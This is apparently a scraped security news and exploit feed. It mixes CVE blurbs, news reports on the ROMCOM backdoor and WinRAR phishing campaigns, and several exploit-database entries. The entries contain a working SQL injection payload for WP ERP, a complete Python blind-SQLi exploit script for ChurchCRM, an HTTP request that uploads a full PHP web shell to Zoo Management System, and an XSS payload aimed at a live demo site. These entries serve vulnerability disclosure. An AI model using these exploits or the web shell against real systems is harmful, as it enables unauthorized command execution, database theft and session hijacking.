IBM Db2 for Linux, UNIX and Windows (includes Db2 Connect Server) 10.5, 11.1, and 11.5 is vulnerable to denial of service with a specially crafted query on certain databases.  IBM X-Force ID:  253440.

CVE-2023-30987: IBM Db2 denial of service CVE-2023-30987 Vulnerability Report

By Deeba Ahmed
Watch out, ladies!
This is a post from HackRead.com Read the original post: ROMCOMLITE: Stealthier Version of ROMCOM Backdoor Targets Female Politicians

*   **Japanese cybersecurity firm **Trend Micro**** **has detected a new malware attack campaign** **dubbed ROMCOMLITE.**

*   **Cyberespionage gang Void Rabisu is targeting female Politicians and government officials. with the new ROMCOM backdoor variant**.

*   **This new variant is compact and stealthier than its predecessor.**

*   **Attackers are using spear-phishing to distribute the backdoor through fake meeting invites.**

*   **If the malware invades a system successfully, it can harvest data, execute remote commands, or capture screenshots.**

A notorious cyberespionage group Void Rabisu, aka Storm-0978, Tropical Scorpius, and UNC2596, has launched a brand-new campaign targeting female political leaders and government officials using a revamped version of a previously detected ROMCOM backdoor.

Hackread.com had reported in July 2023 that Void Rabisu is intensifying its efforts to target politicians, citing a report from the BlackBerry Threat Research and Intelligence team about discovering a campaign where the group targeted Ukraine and NATO supporters with the ROMCOM backdoor RAT delivered via malicious documents.

The ROMCOMLITE campaign was discovered by Japanese cybersecurity firm Trend Micro. This new variant, dubbed ROMCOM 4.0 by Trend Micro and Peapod by Microsoft, allows attackers to gain unauthorized access to the target’s computers and steal sensitive data.

The backdoor was detected in early August, and the malware analysis was published on 31 October. In the report, Feike Hacquebord and Fernando Merces explained that Void Rabisu’s targets were attendees of the Women Political Leaders (WPL) Summit held in Brussels in June 2023.

For your information, Void Rabisu is a sophisticated, hybrid group that conducts espionage and financially motivated attacks and prefers using the Cuba ransomware. It also serves as an APT actor targeting government and military entities/officials.

The gang was discovered first in 2022, but researchers agree that it has been active for a long time. They also suspect this group harbours a geopolitical agenda, as most of its previous campaigns targeted the Ukrainian government/military and EU political/government governments.

In the recent campaign, Trend Micro noted that the backdoor payload was embedded in a malicious copy of the WPL Summit’s official website to improve gender equality in politics. The malicious new backdoor ROMCOM 4.0 is designed to evade detection and remain hidden on the infected system to avoid raising suspicion.

As per the report, the Videos &photos link of the original domain redirects the visitor to a Google Drive folder containing the event’s photographs. Then the fake website (wplsummitcom) directs the visitor to a OneDrive folder containing two compressed files and an executable file (titled: Unpublished Pictures 1-20230802T122531-002-sfx.exe), which is malware.

The gang created this fake website on 8 August, primarily to attract visitors from the original WPL summit domain. The executable file is signed with a valid certificate by a firm called Elbor LLC and extracts 56 photos from its resource section after the user clicks on Extract.

Fake Malicious Website for the WPL Summit 2023 and the folder downloaded by clicking on the ‘Videos & Photos’ contains images and malware downloader (Screenshot Credit: Trend Micro)

Pictures dropped by the malware downloader from the event – According to Trend Micro, these images have been gathered by hackers from different social media posts.

Attackers use spear-phishing tactics to lure their targets. They send fake meeting invitations and other lures so that the targets open malicious attachments or click on links containing the malware.

This is a similar tactic Void Rabisu has used in its campaign discovered in June 2023, where the gang used lures related to the Ukrainian World Congress and the July NATO summit to deliver a zero-day exploit based on an RCE vulnerability in MS Office and Windows HTML, tracked as CVE-2023-36884. Microsoft disclosed this campaign in July.

However, Trend Micro report reveals that the group has used a new tactic in this campaign involving TLS-enforcing by the RomCom C2 servers to make discovering ROMCOM’s infrastructure hard to detect.

“We observed Void Rabisu using this technique in a May 2023 RomCom campaign that spread a malicious copy of the legitimate PaperCut software, in which the C2 server ignored requests that were not conformant,” the report read.

Trend Micro claims there’s no evidence to believe Void Rabisu is a state-sponsored actor. Still, it is clear that the group is trying to benefit from the “extraordinary geopolitical circumstances caused by the war in Ukraine.”

****_RELATED ARTICLES_****

1.  Hackers Target Israeli Rocket Alert App Users with Spyware
2.  Gender Diversity in Cybercrime Forums: Women Users on the Rise
3.  Israeli Rabbi arrested for hacking CCTV cameras at women’ bathing suit shop

ROMCOMLITE: Stealthier Version of ROMCOM Backdoor Targets Female Politicians

The Microsoft Windows Kernel suffers from out-of-bounds reads and paged pool memory disclosure in VrpUpdateKeyInformation.

Microsoft Windows Kernel Out-Of-Bounds Reads / Memory Disclosure

The Microsoft Windows Kernel suffers from a paged pool memory disclosure in VrpPostEnumerateKey.

Microsoft Windows Kernel Paged Pool Memory Disclosure

WordPress WP ERP plugin versions 1.12.2 and below suffer from a remote SQL injection vulnerability.

    # Exploit Title: WP Plugins WP ERP <= 1.12.2 - SQL Injection# Date: 15-10-2023# Exploit Author: Arvandy# Software Link: https://wordpress.org/plugins/erp/# Vendor Homepage: https://wperp.com/# Version: 1.12.2# Tested on: Windows, Linux# CVE: CVE-2023-2744# Product DescriptionWP ERP is the first full-fledged ERP (Enterprise Resource Planning) system through which you can simultaneously manage your WordPress site and business from a single platform. WP ERP aims to deliver all your enterprise business requirements with simplicity. With real-time reports and a better way to handle business data, make your operation better managed, away from errors, and prepare your company for the next leap. WP ERP has 3 core modules: HR, CRM, and Accounting, which together make a complete ERP system for any type of business.# Vulnerability overview:The WordPress Plugins WP ERP - Accounting module <= 1.12.2 is vulnerable to Blind SQL Injection (time-based) via the TYPE parameter on /wp-json/erp/v1/accounting/v1/people endpoint. This vulnerability could lead to unauthorized data access and modification.# Proof of Concept:Affected Endpoint: /wp-json/erp/v1/accounting/v1/people?type=Affected Parameter: typepayload: customer') AND (SELECT 1 FROM (SELECT SLEEP(3))x) AND ('x'='x# RecommendationUpgrade to version 1.12.4

WordPress WP ERP 1.12.2 SQL Injection

ChurchCRM version 4.5.4 suffers from a remote authenticated blind SQL injection vulnerability.

    # Exploit Title: ChurchCRM 4.5.4 - Authenticated Blind SQL Injection via the EN_tyid# Date: 03-05-2023# Exploit Author: Arvandy# Blog Post: https://github.com/arvandy/CVE/blob/main/CVE-2023-29842/CVE-2023-29842.md# Software Link: https://github.com/ChurchCRM/CRM/releases# Vendor Homepage: http://churchcrm.io/# Version: 4.5.4# Tested on: Windows, Linux# CVE: CVE-2023-29842"""The endpoint /EditEventTypes.php is vulnerable to Blind SQL Injection (Time-based) via the EN_tyid POST parameter.This endpoint can be triggered through the following menu: Events - List Event Types - Edit Event Types - Save Name. The EN_tyid Parameter is taken directly from the user input and passed into the SQL query without any sanitization or input escaping. This allows the attacker to inject malicious Event payloads to execute the malicious SQL query.This script is created as Proof of Concept to retrieve the database name and version."""import sys, requestsdef injection(target, inj_str, session_cookies):        for j in range(32, 126):        url = "%s/EditEventTypes.php" % (target)        headers = {'Content-Type':'application/x-www-form-urlencoded','Cookie':'CRM-2c90cf299230a50dab55aee824ed9b08='+str(session_cookies)}            data = "EN_tyid=%s&EN_ctid=&newEvtName=NewEvent&Action=NAME&newEvtStartTime=09:30:00&newCountName=" % (inj_str.replace("[CHAR]", str(j)))        r = requests.post(url, headers=headers, data=data)        res = r.text        if (r.elapsed.total_seconds () > 2 ):            return j    return Nonedef retrieveDBName(session_cookies):       db_name = ""    print("(+) Retrieving database name, please wait")    for i in range (1,100):        injection_str = "1'+UNION+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,IF(ASCII(SUBSTRING((SELECT+DATABASE()),%d,1))=[CHAR],SLEEP(2),null)-- -" % i        retrieved_value = injection(target, injection_str, session_cookies)        if (retrieved_value):            sys.stdout.write(chr(retrieved_value))            sys.stdout.flush()                   else:            breakdef retrieveDBVersion(session_cookies):       db_version = ""    print("(+) Retrieving database version, please wait")    for i in range (1,100):        injection_str = "1'+UNION+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,IF(ASCII(SUBSTRING((SELECT+@@version),%d,1))=[CHAR],SLEEP(2),null)-- -" % i        retrieved_value = injection(target, injection_str, session_cookies)        if (retrieved_value):            sys.stdout.write(chr(retrieved_value))            sys.stdout.flush()        else:            break    def login(target, username, password):    target = "%s/session/begin" % (target)    headers = {'Content-Type': 'application/x-www-form-urlencoded'}    data = "User=%s&Password=%s" % (username, password)    s = requests.session()    r = s.post(target, data = data, headers = headers)    return s.cookies.get('CRM-2c90cf299230a50dab55aee824ed9b08')def main():    print("(!) Login to the target application")    session_cookies = login(target, username, password)               print("(!) Exploiting the Blind Auth SQL Injection to retrieve database name and versions")    retrieveDBName(session_cookies)        print("")    retrieveDBVersion(session_cookies)    if __name__ == "__main__":    if len(sys.argv) != 4:        print("(!) Usage: python3 exploit.py <URL> <username> <password>")        print("(!) E.g.,: python3 exploit.py http://192.168.1.100/ChurchCRM user pass")        sys.exit(-1)    target = sys.argv[1]    username = sys.argv[2]    password = sys.argv[3]        main()

ChurchCRM 4.5.4 SQL Injection

Zoo Management System version 1.0 suffers from a remote shell upload vulnerability. This version originally had a shell upload vulnerability discovered by D4rkP0w4r that leveraged the upload CV flow but this particular finding leverages the save_animal flow.

# Exploit Title: Zoo Management System 1.0 - Unauthenticated RCE  
# Date: 16.10.2023  
# Exploit Author: Çağatay Ceyhan  
# Vendor Homepage: https://www.sourcecodester.com/php/15347/zoo-management-system-source-code-php-mysql-database.html#google_vignette  
# Software Link: https://www.sourcecodester.com/download-code?nid=15347&title=Zoo+Management+System+source+code+in+PHP+with+MySQL+Database  
# Version: 1.0  
# Tested on: Windows 11

## Unauthenticated users can access /zoomanagementsystem/admin/public_html/save_animal address and they can upload malicious php file instead of animal picture image without any authentication.

POST /zoomanagementsystem/admin/public_html/save_animal HTTP/1.1  
Host: localhost  
Content-Length: 6162  
Cache-Control: max-age=0  
sec-ch-ua: "Chromium";v="117", "Not;A=Brand";v="8"  
sec-ch-ua-mobile: ?0  
sec-ch-ua-platform: "Windows"  
Upgrade-Insecure-Requests: 1  
Origin: http://localhost  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary8NY8zT5dXIloiUML  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: navigate  
Sec-Fetch-User: ?1  
Sec-Fetch-Dest: document  
Referer: http://localhost/zoomanagementsystem/admin/public_html/save_animal  
Accept-Encoding: gzip, deflate, br  
Accept-Language: en-US,en;q=0.9  
Connection: close

------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="animal_id"

------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="an_given_name"

kdkd  
------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="an_species_name"

ıdsıd  
------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="an_dob"

1552-02-05  
------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="an_gender"

m  
------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="an_avg_lifespan"

3  
------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="class_id"

2  
------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="location_id"

2  
------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="an_dietary_req"

2  
------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="an_natural_habitat"

faad  
------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="an_pop_dist"

eterter  
------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="an_joindate"

5559-02-06  
------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="an_height"

2  
------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="an_weight"

3  
------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="an_description"

------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="images[]"; filename="ultra.php"  
Content-Type: application/octet-stream

<?php  
if (!empty($_POST['cmd'])) {  
    $cmd = shell_exec($_POST['cmd']);  
}  
?>  
<!DOCTYPE html>  
<html lang="en">  
<head>  
    <meta charset="utf-8">  
    <meta http-equiv="X-UA-Compatible" content="IE=edge">  
    <meta name="viewport" content="width=device-width, initial-scale=1">  
    <title>Web Shell</title>  
    <style>  
        * {  
            -webkit-box-sizing: border-box;  
            box-sizing: border-box;  
        }

        body {  
            font-family: sans-serif;  
            color: rgba(0, 0, 0, .75);  
        }

        main {  
            margin: auto;  
            max-width: 850px;  
        }

        pre,  
        input,  
        button {  
            padding: 10px;  
            border-radius: 5px;  
            background-color: #efefef;  
        }

        label {  
            display: block;  
        }

        input {  
            width: 100%;  
            background-color: #efefef;  
            border: 2px solid transparent;  
        }

        input:focus {  
            outline: none;  
            background: transparent;  
            border: 2px solid #e6e6e6;  
        }

        button {  
            border: none;  
            cursor: pointer;  
            margin-left: 5px;  
        }

        button:hover {  
            background-color: #e6e6e6;  
        }

        .form-group {  
            display: -webkit-box;  
            display: -ms-flexbox;  
            display: flex;  
            padding: 15px 0;  
        }  
    </style>

</head>

<body>  
    <main>  
        <h1>Web Shell</h1>  
        <h2>Execute a command</h2>

        <form method="post">  
            <label for="cmd"><strong>Command</strong></label>  
            <div class="form-group">  
                <input type="text" name="cmd" id="cmd" value="<?= htmlspecialchars($_POST['cmd'], ENT_QUOTES, 'UTF-8') ?>"  
                       onfocus="this.setSelectionRange(this.value.length, this.value.length);" autofocus required>  
                <button type="submit">Execute</button>  
            </div>  
        </form>

        <?php if ($_SERVER['REQUEST_METHOD'] === 'POST'): ?>  
            <h2>Output</h2>  
            <?php if (isset($cmd)): ?>  
                <pre><?= htmlspecialchars($cmd, ENT_QUOTES, 'UTF-8') ?></pre>  
            <?php else: ?>  
                <pre><small>No result.</small></pre>  
            <?php endif; ?>  
        <?php endif; ?>  
    </main>  
</body>  
</html>  
------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="an_med_record"

------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="an_transfer"

------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="an_transfer_reason"

------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="an_death_date"

------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="an_death_cause"

------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="an_incineration"

------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="m_gest_period"

------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="m_category"

------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="m_avg_body_temp"

------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="b_nest_const"

------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="b_clutch_size"

------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="b_wingspan"

------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="b_color_variant"

------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="f_body_temp"

------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="f_water_type"

------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="f_color_variant"

------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="rep_type"

------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="clutch_size"

------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="num_offspring"

------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="submit"

------WebKitFormBoundary8NY8zT5dXIloiUML--

## After the post request sent by an attacker, the malicious file can be seen under the http://localhost/zoomanagementsystem/img/animals/. the attacker can execute arbitrary command on http://localhost/zoomanagementsystem/img/animals/ultra_1697442648.php.

Zoo Management System 1.0 Shell Upload

2023 Mount Carmel School version 6.4.1 suffers from a cross site scripting vulnerability.

## Title: 2023-Mount-Carmel-School-6.4.1 XSS-Reflected - User Interaction  
## Author: nu11secur1ty  
## Date: 10/14/2023  
## Vendor: https://smart-school.in/  
## Software: https://demo.smart-school.in/site/userlogin#  
## Reference: https://portswigger.net/kb/issues/00200300_cross-site-scripting-reflected

## Description:  
The user can manipulate the system by injecting an HTML code into the  
system without any restriction.  
The function apply_leave is not sanitizing correctly. This could allow  
the user to inject this  
application by using HTML or Java Script with very malicious purposes etc...

STATUS: HIGH- Vulnerability

[+]Exploit:  
```HTML  
POST /user/apply_leave/add HTTP/1.1  
Host: demo.smart-school.in  
Cookie: ci_session=495u2fpup87iml75p4us2uuqgqkpsof9  
Content-Length: 1492  
Sec-Ch-Ua: "Chromium";v="117", "Not;A=Brand";v="8"  
Accept: application/json, text/javascript, */*; q=0.01  
Content-Type: multipart/form-data;  
boundary=----WebKitFormBoundary5wuzslDN9siOCW0K  
X-Requested-With: XMLHttpRequest  
Sec-Ch-Ua-Mobile: ?0  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)  
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132  
Safari/537.36  
Sec-Ch-Ua-Platform: "Windows"  
Origin: https://demo.smart-school.in  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: cors  
Sec-Fetch-Dest: empty  
Referer: https://demo.smart-school.in/user/apply_leave  
Accept-Encoding: gzip, deflate, br  
Accept-Language: en-US,en;q=0.9  
Connection: close

------WebKitFormBoundary5wuzslDN9siOCW0K  
Content-Disposition: form-data; name="homework_id"

------WebKitFormBoundary5wuzslDN9siOCW0K  
Content-Disposition: form-data; name="apply_date"

10/14/2023  
------WebKitFormBoundary5wuzslDN9siOCW0K  
Content-Disposition: form-data; name="from_date"

09/27/2023  
------WebKitFormBoundary5wuzslDN9siOCW0K  
Content-Disposition: form-data; name="to_date"

09/29/2023  
------WebKitFormBoundary5wuzslDN9siOCW0K  
Content-Disposition: form-data; name="leave_id"

------WebKitFormBoundary5wuzslDN9siOCW0K  
Content-Disposition: form-data; name="message"

<a href="https://www.youtube.com/watch?v=yPuC4Cy2ZuI" target="_blank"  
rel="noopener nofollow ugc">  
<img src="https://raw.githubusercontent.com/nu11secur1ty/XSSight/master/nu11secur1ty/images/chalga-tochilka.gif"  
style="border:1px solid black;max-width:100%;" alt="Photo of Byron  
Bay, one of Australia's best beaches!">  
------WebKitFormBoundary5wuzslDN9siOCW0K  
Content-Disposition: form-data; name="files[]"; filename="kurec.svg"  
Content-Type: image/svg+xml

<?xml version="1.0" standalone="no"?>  
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"  
"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">  
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900"  
stroke="#004400"/>  
   <script type="text/javascript">  
      alert(document.cookie);  
   </script>  
</svg>

------WebKitFormBoundary5wuzslDN9siOCW0K--

```

## Reproduce:  
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/smart-school.in/2023/Mount-Carmel-School-6.4.1)

## Proof and Exploit:  
[href](https://www.nu11secur1ty.com/2023/10/2023-mount-carmel-school-641-xss.html)

## Time spent:  
00:37:00

2023 Mount Carmel School 6.4.1 Cross Site Scripting

The Microsoft Windows Kernel passes user-mode pointers to registry callbacks, leading to race conditions and memory corruption.

Microsoft Windows Kernel Race Condition / Memory Corruption

Pro-Russian hacking groups have exploited a recently disclosed security vulnerability in the WinRAR archiving utility as part of a phishing campaign designed to harvest credentials from compromised systems.
"The attack involves the use of malicious archive files that exploit the recently discovered vulnerability affecting the WinRAR compression software versions prior to 6.23 and traced as

Pro-Russian hacking groups have exploited a recently disclosed security vulnerability in the WinRAR archiving utility as part of a phishing campaign designed to harvest credentials from compromised systems.

"The attack involves the use of malicious archive files that exploit the recently discovered vulnerability affecting the WinRAR compression software versions prior to 6.23 and traced as CVE-2023-38831," Cluster25 said in a report published last week.

The archive contains a booby-trapped PDF file that, when clicked, causes a Windows Batch script to be executed, which launches PowerShell commands to open a reverse shell that gives the attacker remote access to the targeted host.

Also deployed is a PowerShell script that steals data, including login credentials, from the Google Chrome and Microsoft Edge browsers. The captured information is exfiltrated via a legitimate web service webhook\[.\]site.

CVE-2023-38831 refers to a high-severity flaw in WinRAR that allows attackers to execute arbitrary code upon attempting to view a benign file within a ZIP archive. Findings from Group-IB in August 2023 disclosed that the bug had been weaponized as a zero-day since April 2023 in attacks targeting traders.

The development comes as Google-owned Mandiant charted Russian nation-state actor APT29's "rapidly evolving" phishing operations targeting diplomatic entities amid an uptick in tempo and an emphasis on Ukraine in the first half of 2023.

The substantial changes in APT29's tooling and tradecraft are "likely designed to support the increased frequency and scope of operations and hinder forensic analysis," the company said, and that it has "used various infection chains simultaneously across different operations."

Some of the notable changes include the use of compromised WordPress sites to host first-stage payloads as well as additional obfuscation and anti-analysis components.

AT29, which has also been linked to cloud-focused exploitation, is one of the many activity clusters originating from Russia that have singled out Ukraine following the onset of the war early last year.

In July 2023, the Computer Emergency Response Team of Ukraine (CERT-UA) implicated Turla in attacks deploying the Capibar malware and Kazuar backdoor for espionage attacks on Ukrainian defensive assets.

"The Turla group is a persistent adversary with a long history of activities. Their origins, tactics, and targets all indicate a well-funded operation with highly skilled operatives," Trend Micro disclosed in a recent report. "Turla has continuously developed its tools and techniques over years and will likely keep on refining them."

Ukrainian cybersecurity agencies, in a report last month, also revealed that Kremlin-backed threat actors targeted domestic law enforcement entities to collect information about Ukrainian investigations into war crimes committed by Russian soldiers.

"In 2023, the most active groups were UAC-0010 (Gamaredon/FSB), UAC-0056 (GRU), UAC-0028 (APT28/GRU), UAC-0082 (Sandworm/GRU), UAC-0144 / UAC-0024 / UAC-0003 (Turla), UAC-0029 (APT29/ SVR), UAC-0109 (Zarya), UAC-0100, UAC-0106 (XakNet), \[and\] UAC-0107 (CyberArmyofRussia)," the State Service of Special Communications and Information Protection of Ukraine (SSSCIP) said.

CERT-UA recorded 27 "critical" cyber incidents in H1 of 2023, compared to 144 in the second half of 2022 and 319 in the first half of 2022. In total, destructive cyber-attacks affecting operations fell from 518 to 267.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#windows